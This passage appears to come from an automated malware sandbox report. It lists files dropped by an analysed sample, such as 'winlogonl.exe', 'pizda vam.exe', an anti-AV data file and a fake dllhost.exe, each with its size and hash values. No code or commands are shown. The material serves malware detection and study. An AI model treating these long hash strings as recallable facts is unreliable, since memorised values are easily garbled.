                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -pss -s 408 -p 191424 -ip 191424
                                1⤵
                                  PID:24032

                                Network

                                MITRE ATT&CK Enterprise v6

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\ProgramData\AstarotSoftware\ULKPF.exe

                                  Filesize

                                  846KB

                                  MD5

                                  d38954502bf90ec1b8d4a1ae7a3f05b9

                                  SHA1

                                  fe9a449203912f555f9d12218af78619fef77736

                                  SHA256

                                  5a472bc6b209374e2ad379f68e82849bfc6429164ab0997eea7883115f761962

                                  SHA512

                                  0f1ce73bc419115a5606add2f91bcaa16c3e46de463fa6c7db5007e789cc4f0fce4c9f54c74d47e075abb8fc0d3df929956f1965dc51afd539b7438bc9f10b71

                                • C:\ProgramData\AstarotSoftware\ULKPF.exe

                                  Filesize

                                  846KB

                                  MD5

                                  d38954502bf90ec1b8d4a1ae7a3f05b9

                                  SHA1

                                  fe9a449203912f555f9d12218af78619fef77736

                                  SHA256

                                  5a472bc6b209374e2ad379f68e82849bfc6429164ab0997eea7883115f761962

                                  SHA512

                                  0f1ce73bc419115a5606add2f91bcaa16c3e46de463fa6c7db5007e789cc4f0fce4c9f54c74d47e075abb8fc0d3df929956f1965dc51afd539b7438bc9f10b71

                                • C:\ProgramData\cc0mdfd2asm.exe

                                  Filesize

                                  7.8MB

                                  MD5

                                  a3f015e8c92431690f0537f893885692

                                  SHA1

                                  a57ed1068ef698cc324a9afcd976a685a2f5fb92

                                  SHA256

                                  7386e9b0acbc7ca1c8589ee8f4e0d1bd2e08da67014c82537b85ced6aeb49fd3

                                  SHA512

                                  3363a131e8956f6e3455c565545674c35467c177ca26a76a9719ffd14543e6192bbb87f930497b2d644a066d64eb9b41a01410e574216e6faf0bb6f2feb8acd3

                                • C:\ProgramData\cc0mdfd2asm.exe

                                  Filesize

                                  7.8MB

                                  MD5

                                  a3f015e8c92431690f0537f893885692

                                  SHA1

                                  a57ed1068ef698cc324a9afcd976a685a2f5fb92

                                  SHA256

                                  7386e9b0acbc7ca1c8589ee8f4e0d1bd2e08da67014c82537b85ced6aeb49fd3

                                  SHA512

                                  3363a131e8956f6e3455c565545674c35467c177ca26a76a9719ffd14543e6192bbb87f930497b2d644a066d64eb9b41a01410e574216e6faf0bb6f2feb8acd3

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  3KB

                                  MD5

                                  556084f2c6d459c116a69d6fedcc4105

                                  SHA1

                                  633e89b9a1e77942d822d14de6708430a3944dbc

                                  SHA256

                                  88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                  SHA512

                                  0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  41363f4347aa676b9d9de81803d531c9

                                  SHA1

                                  dd63c1fcc79c874045f554a580c72adceb496379

                                  SHA256

                                  b5228b3cc9a89a34fd53e4c39a9d98356ff202cbb840a22e898721c08fac85e0

                                  SHA512

                                  424a4d253cadfdd886d1987becab33aed588fa1f1338df791abb9e6faae80bdce9f1011043069ebacb48ffec542183434c693b2692acd476b63ef78f7b093975

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  331841fe482ffe8b1cc1509733d8ca67

                                  SHA1

                                  1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8

                                  SHA256

                                  14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f

                                  SHA512

                                  039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  b8cc62845543a6b9f1a4b2e64dedf2d7

                                  SHA1

                                  6e29b6362ad8972f3b80071eb8a2e4de79870f16

                                  SHA256

                                  04d13143574f6d4509f85f4167043c35a90f773d4feb381b8e30554f7a0fec06

                                  SHA512

                                  7a924a1f903dd08939e49978298af99d2214b1ad6537237ca8b774a2fde2b0ec198a5c787d1049de499e4b876a429930144815619767d5fc700e1c282329a157

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  64B

                                  MD5

                                  d5161575b78a7cfb6fdce2dfd363031d

                                  SHA1

                                  ca17416fdfa39530d5c3157a26703d277e8ec43f

                                  SHA256

                                  a86fc8ce58db084b06f81b478f12d45540069e37d01f11307e77f8225dca3fee

                                  SHA512

                                  a66f2112f02f1e7772bd93e387df43000c96ea32148a3dc598b12e464027b7628b9988c162e574ea4483a69ef9c8e02932163b1f7924c0331b76e827223e273a

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  64B

                                  MD5

                                  446dd1cf97eaba21cf14d03aebc79f27

                                  SHA1

                                  36e4cc7367e0c7b40f4a8ace272941ea46373799

                                  SHA256

                                  a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                  SHA512

                                  a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  64B

                                  MD5

                                  446dd1cf97eaba21cf14d03aebc79f27

                                  SHA1

                                  36e4cc7367e0c7b40f4a8ace272941ea46373799

                                  SHA256

                                  a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                  SHA512

                                  a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  96ff1ee586a153b4e7ce8661cabc0442

                                  SHA1

                                  140d4ff1840cb40601489f3826954386af612136

                                  SHA256

                                  0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

                                  SHA512

                                  3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

                                • C:\Users\Admin\AppData\Local\Temp\1.exe

                                  Filesize

                                  4.0MB

                                  MD5

                                  c0ad27f22242689de0668e4404442e2a

                                  SHA1

                                  aed3badcd5f2167cc6f9ec9244d0be270be878f6

                                  SHA256

                                  0eaa5732da6bceca28eb5309269d90d9f68f80adf9e2bfc83494d173d90b6d98

                                  SHA512

                                  7552f52739f7003685e7b9b577037f3f69e8d907ae99e4fd248ff941ba4910d0ad2cab372b7e8fd2ccfccb021192a6ef1b1e157d48f50e9e2f7db448fdeed0cc

                                • C:\Users\Admin\AppData\Local\Temp\1.exe

                                  Filesize

                                  4.0MB

                                  MD5

                                  c0ad27f22242689de0668e4404442e2a

                                  SHA1

                                  aed3badcd5f2167cc6f9ec9244d0be270be878f6

                                  SHA256

                                  0eaa5732da6bceca28eb5309269d90d9f68f80adf9e2bfc83494d173d90b6d98

                                  SHA512

                                  7552f52739f7003685e7b9b577037f3f69e8d907ae99e4fd248ff941ba4910d0ad2cab372b7e8fd2ccfccb021192a6ef1b1e157d48f50e9e2f7db448fdeed0cc

                                • C:\Users\Admin\AppData\Local\Temp\build.exe

                                  Filesize

                                  2.5MB

                                  MD5

                                  5251c3cd61396eeb732de01832040c6f

                                  SHA1

                                  9523aca0dacb3e25e234157b69deca035564786f

                                  SHA256

                                  f9b5057081ca6e37c63a992234668b244551053a63582ee5bcd24e9e06222278

                                  SHA512

                                  42c5a0a4a1fa1fcc33d4411b6b04e6061123a5b60c75a06d309693a67795fe0f2a0f77469063c3451530d8bb31093cb8fd4af3946d2deb99f751503340bd4bea

                                • C:\Users\Admin\AppData\Local\Temp\build.exe

                                  Filesize

                                  2.5MB

                                  MD5

                                  5251c3cd61396eeb732de01832040c6f

                                  SHA1

                                  9523aca0dacb3e25e234157b69deca035564786f

                                  SHA256

                                  f9b5057081ca6e37c63a992234668b244551053a63582ee5bcd24e9e06222278

                                  SHA512

                                  42c5a0a4a1fa1fcc33d4411b6b04e6061123a5b60c75a06d309693a67795fe0f2a0f77469063c3451530d8bb31093cb8fd4af3946d2deb99f751503340bd4bea

                                • C:\Users\Admin\AppData\Local\Temp\gmx.exe

                                  Filesize

                                  2.5MB

                                  MD5

                                  167fb4a62e319ac24529214bec90430a

                                  SHA1

                                  59689250ef501d37007b0af6a14fdbed9f53a7e4

                                  SHA256

                                  1cead347be80d5d5a2de0958c3745e4b74067ea15fe58874b955020162929ef4

                                  SHA512

                                  74b57668718f27c36633987d0b3469b989839ef3696aee78a75032aa892e7e880758235a58d95b653c95a67e745c5bf7c8744bcd599315d60c128f0e381ac123

                                • C:\Users\Admin\AppData\Local\Temp\gmx.exe

                                  Filesize

                                  2.5MB

                                  MD5

                                  167fb4a62e319ac24529214bec90430a

                                  SHA1

                                  59689250ef501d37007b0af6a14fdbed9f53a7e4

                                  SHA256

                                  1cead347be80d5d5a2de0958c3745e4b74067ea15fe58874b955020162929ef4

                                  SHA512

                                  74b57668718f27c36633987d0b3469b989839ef3696aee78a75032aa892e7e880758235a58d95b653c95a67e745c5bf7c8744bcd599315d60c128f0e381ac123

                                • C:\Users\Admin\AppData\Local\Temp\main\5us64diotf.exe

                                  Filesize

                                  1.6MB

                                  MD5

                                  0e4380568b3eb92c583669b8e4155f81

                                  SHA1

                                  58f2068513fd10fcf532012787ae61fe4c04230f

                                  SHA256

                                  6890508d55211e238aa952873bfee7e92fe73407ddbe1cf1805925fc5b48538b

                                  SHA512

                                  103202c827093211f9281ede124964a552fa32b6b0fc39e13065be72a29f7dbc353bbdcb7e620a82828f76e475f62abf7d141c6ebc26b45b38e3a580d8e72fdf

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                  Filesize

                                  1.6MB

                                  MD5

                                  72491c7b87a7c2dd350b727444f13bb4

                                  SHA1

                                  1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                  SHA256

                                  34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                  SHA512

                                  583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                  Filesize

                                  458KB

                                  MD5

                                  619f7135621b50fd1900ff24aade1524

                                  SHA1

                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                  SHA256

                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                  SHA512

                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                  Filesize

                                  458KB

                                  MD5

                                  619f7135621b50fd1900ff24aade1524

                                  SHA1

                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                  SHA256

                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                  SHA512

                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                  Filesize

                                  458KB

                                  MD5

                                  619f7135621b50fd1900ff24aade1524

                                  SHA1

                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                  SHA256

                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                  SHA512

                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                  Filesize

                                  458KB

                                  MD5

                                  619f7135621b50fd1900ff24aade1524

                                  SHA1

                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                  SHA256

                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                  SHA512

                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                  Filesize

                                  458KB

                                  MD5

                                  619f7135621b50fd1900ff24aade1524

                                  SHA1

                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                  SHA256

                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                  SHA512

                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                  Filesize

                                  458KB

                                  MD5

                                  619f7135621b50fd1900ff24aade1524

                                  SHA1

                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                  SHA256

                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                  SHA512

                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                  Filesize

                                  458KB

                                  MD5

                                  619f7135621b50fd1900ff24aade1524

                                  SHA1

                                  6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                  SHA256

                                  344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                  SHA512

                                  2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\5us64diotf.exe

                                  Filesize

                                  1.6MB

                                  MD5

                                  0e4380568b3eb92c583669b8e4155f81

                                  SHA1

                                  58f2068513fd10fcf532012787ae61fe4c04230f

                                  SHA256

                                  6890508d55211e238aa952873bfee7e92fe73407ddbe1cf1805925fc5b48538b

                                  SHA512

                                  103202c827093211f9281ede124964a552fa32b6b0fc39e13065be72a29f7dbc353bbdcb7e620a82828f76e475f62abf7d141c6ebc26b45b38e3a580d8e72fdf

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

                                  Filesize

                                  2.0MB

                                  MD5

                                  a0f97e921ce541832527cbb0788a6e23

                                  SHA1

                                  75b8f5eff313eb2a539b4adb5c3507ec460c167b

                                  SHA256

                                  5be6cab967439b20de2b4a84d10b7bc3fae21546ac1cecef4b0865e111b15754

                                  SHA512

                                  2cce6ced22e20a487bdb8cb22253ef1a00958c0d0b718d0d9362bb43f9f5d5d656becf00101c43443bc3322422dfef6eb4e994d91ca148a0b1b1bf2abf0ec2bd

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

                                  Filesize

                                  1.5MB

                                  MD5

                                  0ed889eaecd90a1ed9d3d12dc8bce140

                                  SHA1

                                  9142d543d17cc0ef5d11df7d46e876bd3884b55a

                                  SHA256

                                  a33f9a4db9b43e4112ffc43987d54d050425663266f0cd872a8eef901ed27db2

                                  SHA512

                                  3f4efdbe240f904c7dee47d0dd0c7555e411dfb0c40492adab93649d1aebd87da32ac37c40a46f69482602214acc2ee1904853fb7567f03e04c0d220767f8fb9

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

                                  Filesize

                                  1.5MB

                                  MD5

                                  a7dda88ab708342a20cd473fe039b480

                                  SHA1

                                  0333e79954f15c89f54b329f4b69f434e6fcd0ad

                                  SHA256

                                  7e6fde219aeb1ccc34ccb75fa58ac0972e98e1a37d299b823f88b19c9398dacf

                                  SHA512

                                  ab91600416f8c780b7cbaa857a9887ec5aefd1f9db5abc32cec23b2f40e9e8fe24d7454c9b229cb45f65f0ae747e1922e7e27f79a70795d768affa37192ee215

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

                                  Filesize

                                  1.5MB

                                  MD5

                                  15ae20f5f5b91ae9cfa445c049ef64ce

                                  SHA1

                                  54804b4d4eeb7f690541279c3f3191102cc62a59

                                  SHA256

                                  a96da7648608b2a442f6741b933312f5208adad48bc20e64826bcbb8c6ac50e3

                                  SHA512

                                  b4e075eb4f4d32fea285e0f58bb942b4d86ec71e34ef89ee5a5856bfcfebde6f5058362a48f38b01b58ef28eb8b41d3954f872f360003aca3069dc71adb6cd02

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

                                  Filesize

                                  1.5MB

                                  MD5

                                  704d816c67a692572ed24d584e6ab59a

                                  SHA1

                                  a5b1fcc73ab57bf9022fe702c815ed3ca173b9ed

                                  SHA256

                                  c703eb99e0ac34d8f30dd179e4fae242b6832d8ab72d6b4393d1643a47eb448c

                                  SHA512

                                  cefb1c87d82aa3e15bf492ca68c511b1a05d950694fde8212b16eac37a1fb2f34a1c7fc2ad7da040b7f3568e92af04d3e8708af0ee32f81628b07b7135036c7a

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

                                  Filesize

                                  1.5MB

                                  MD5

                                  e55f26ecddfa938bb5c8d5db8670cfb3

                                  SHA1

                                  81f20083c2688500a4f71888fcfbfece2fe96bb9

                                  SHA256

                                  fc19727148903bfe96468d6359cd8275b524728c684b515f8c0a9d7b8f69aa94

                                  SHA512

                                  50c4c8fdd6088181824b34c871e83ff3ca9b42cc6f2ff006ec48fa81f3fb1fc044deba36755f79e65cfd089f0925c70fb8d1c3a19a172f9ed408815802c0fe79

                                • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

                                  Filesize

                                  3.0MB

                                  MD5

                                  52dcfc90ccd92dc954d0bb1365970f65

                                  SHA1

                                  4b31b06d42ab5852dedca8e6f3f9d73c8e4d8c43

                                  SHA256

                                  7f8ad85de1e16e0b97d07302d7496b097c441b534bfe7d5beb75ad1a2e01d96c

                                  SHA512

                                  71aa722043a89c61d09df646e9fc69690b0c5ee9150625ded2812f496633087e258b0a37403705e9904c69befdf4f380c78ac456cf0b375e3fa5b5437a1098a1

                                • C:\Users\Admin\AppData\Local\Temp\main\file.bin

                                  Filesize

                                  3.0MB

                                  MD5

                                  ecf86c169e3a7d0f7d309b03851ee5c2

                                  SHA1

                                  743dd66090569277fa4b5cc489efa28d82b7166f

                                  SHA256

                                  64db03237d15347e005fe1f2872d5ae5a157a699ffee321bcfc70b1723f8aef4

                                  SHA512

                                  ed8696a12e9604c1f31e3b2c7943da597b46ee4460f197117fe2973d58d548228cca4cbb8fb8f0598636008d6f22de7e2546c9fb643f757ede5b9c447bfed6eb

                                • C:\Users\Admin\AppData\Local\Temp\main\main.bat

                                  Filesize

                                  481B

                                  MD5

                                  b55b2f59bdb4141e87cfc7c314991798

                                  SHA1

                                  133f4b40f5d540cbd4aa7201fb60687e30f73971

                                  SHA256

                                  ef5ffa8103a09c6815d328282fc7528f9ae5391eb8882308b5845a8e8aab80b7

                                  SHA512

                                  2380ffeb537c7005b8f3128d533d2c8b9f35de6556033bafbeb98905162ee696415295722a709ead808c290b14472c61c95c3e417195004f7fce101e8e405beb

                                • C:\Users\Admin\AppData\Local\Temp\panel nac.exe

                                  Filesize

                                  551KB

                                  MD5

                                  d5693f40eb0930abd4dadfa58e590b4d

                                  SHA1

                                  ea6571b567c6c692dbd19ec9a59a21ef3c98fc48

                                  SHA256

                                  0ec468d6134e377b52a1f4e9251d55272d443177a86aad58b06381fc5fa6fb2e

                                  SHA512

                                  ffd9624b0547a4f40e12d90342eaedf4bde993bf08e15268e38d62445a2382f4ba6af3a7d59a0d58e87a212b3f11b7f66ae98f0391df1a393e3f42bfca62312f

                                • C:\Users\Admin\AppData\Local\Temp\panel nac.exe

                                  Filesize

                                  551KB

                                  MD5

                                  d5693f40eb0930abd4dadfa58e590b4d

                                  SHA1

                                  ea6571b567c6c692dbd19ec9a59a21ef3c98fc48

                                  SHA256

                                  0ec468d6134e377b52a1f4e9251d55272d443177a86aad58b06381fc5fa6fb2e

                                  SHA512

                                  ffd9624b0547a4f40e12d90342eaedf4bde993bf08e15268e38d62445a2382f4ba6af3a7d59a0d58e87a212b3f11b7f66ae98f0391df1a393e3f42bfca62312f

                                • C:\Users\Admin\AppData\Local\Temp\pizda vam.exe

                                  Filesize

                                  846KB

                                  MD5

                                  d38954502bf90ec1b8d4a1ae7a3f05b9

                                  SHA1

                                  fe9a449203912f555f9d12218af78619fef77736

                                  SHA256

                                  5a472bc6b209374e2ad379f68e82849bfc6429164ab0997eea7883115f761962

                                  SHA512

                                  0f1ce73bc419115a5606add2f91bcaa16c3e46de463fa6c7db5007e789cc4f0fce4c9f54c74d47e075abb8fc0d3df929956f1965dc51afd539b7438bc9f10b71

                                • C:\Users\Admin\AppData\Local\Temp\pizda vam.exe

                                  Filesize

                                  846KB

                                  MD5

                                  d38954502bf90ec1b8d4a1ae7a3f05b9

                                  SHA1

                                  fe9a449203912f555f9d12218af78619fef77736

                                  SHA256

                                  5a472bc6b209374e2ad379f68e82849bfc6429164ab0997eea7883115f761962

                                  SHA512

                                  0f1ce73bc419115a5606add2f91bcaa16c3e46de463fa6c7db5007e789cc4f0fce4c9f54c74d47e075abb8fc0d3df929956f1965dc51afd539b7438bc9f10b71

                                • C:\Users\Admin\AppData\Local\Temp\tmp201B.tmp.bat

                                  Filesize

                                  167B

                                  MD5

                                  d33cbd44a31cabc59c888b9c01326b6b

                                  SHA1

                                  27c63bfa6f0ffad6bbce4ae865318067b6b94689

                                  SHA256

                                  57d636845f2af4cc0d909d7bd03759d913e903d5c7cc989603fab05ee59f1a65

                                  SHA512

                                  53e0b9354c24bf97a2bf8bf69c827d861d6ce90b34c377eb95e1fc0e90f2390931ed72c04c1642aeb89138ce450e53351d8b1fb785502052edac05ba6a03a94b

                                • C:\Users\Admin\AppData\Local\Temp\tmp54C7.tmp.bat

                                  Filesize

                                  149B

                                  MD5

                                  698a200a1c35d857624bbf3386513f76

                                  SHA1

                                  37261f325d7fe4d53bf6301b4105dad65e1103e0

                                  SHA256

                                  70e36a2b31f2c0b5b8ca9c108282cda975fc2fa627dc2c74fa77d59a8608dfba

                                  SHA512

                                  cc9147e25def0bb16e85d3588dfa737eb82b3c7a84dd50d86087fc76f539c3a64ffaa89e83f6bf6b7b67860a99126066d8d312650ab2b480d9a1de6cd4029f95

                                • C:\Users\Admin\AppData\Local\Temp\tmp7BBC.tmp.bat

                                  Filesize

                                  156B

                                  MD5

                                  a6bbab49b9cfd7e7ce8830696b4f2890

                                  SHA1

                                  5021f793ac23b0863bc35d214aff313b4ce0188a

                                  SHA256

                                  19936004aadd26a5e56cef9cddffc0ea8bbc7afe8bff73240558ad046ae219f2

                                  SHA512

                                  b0327c8119f9908883c190779da5fbbbe41d5ae4db75b2d782eaf684b3bb8fe4a80fb80e62721e25ca1e4fdafc5842749b00a6fe219f6eda9e3377a24cce6e8a

                                • C:\Users\Admin\AppData\Local\Temp\winlogonl.exe

                                  Filesize

                                  5.2MB

                                  MD5

                                  9170ac4e0a5177f903c178360de91dfb

                                  SHA1

                                  f4ca61c687fea0482a2b331b98f218b4f92d9041

                                  SHA256

                                  f2ff7231a4988f1810539eef98fe32d896b67c3ed1b38c89149696a10c79e205

                                  SHA512

                                  6bfcf506f1b2ebe8612c1638284e7ec60ad48f5a72cc9c225b0e7b52aff23d3bd3207bc65b0161f94680ce55e58047311245065ebc83af14c336151bca0cbafd

                                • C:\Users\Admin\AppData\Local\Temp\winlogonl.exe

                                  Filesize

                                  5.2MB

                                  MD5

                                  9170ac4e0a5177f903c178360de91dfb

                                  SHA1

                                  f4ca61c687fea0482a2b331b98f218b4f92d9041

                                  SHA256

                                  f2ff7231a4988f1810539eef98fe32d896b67c3ed1b38c89149696a10c79e205

                                  SHA512

                                  6bfcf506f1b2ebe8612c1638284e7ec60ad48f5a72cc9c225b0e7b52aff23d3bd3207bc65b0161f94680ce55e58047311245065ebc83af14c336151bca0cbafd

                                • C:\Users\Admin\AppData\Local\WindowsDriversEtc\dllhost.exe

                                  Filesize

                                  551KB

                                  MD5

                                  d5693f40eb0930abd4dadfa58e590b4d

                                  SHA1

                                  ea6571b567c6c692dbd19ec9a59a21ef3c98fc48

                                  SHA256

                                  0ec468d6134e377b52a1f4e9251d55272d443177a86aad58b06381fc5fa6fb2e

                                  SHA512

                                  ffd9624b0547a4f40e12d90342eaedf4bde993bf08e15268e38d62445a2382f4ba6af3a7d59a0d58e87a212b3f11b7f66ae98f0391df1a393e3f42bfca62312f

                                • C:\Users\Admin\AppData\Local\WindowsDriversEtc\dllhost.exe

                                  Filesize

                                  551KB

                                  MD5

                                  d5693f40eb0930abd4dadfa58e590b4d

                                  SHA1

                                  ea6571b567c6c692dbd19ec9a59a21ef3c98fc48

                                  SHA256

                                  0ec468d6134e377b52a1f4e9251d55272d443177a86aad58b06381fc5fa6fb2e

                                  SHA512

                                  ffd9624b0547a4f40e12d90342eaedf4bde993bf08e15268e38d62445a2382f4ba6af3a7d59a0d58e87a212b3f11b7f66ae98f0391df1a393e3f42bfca62312f

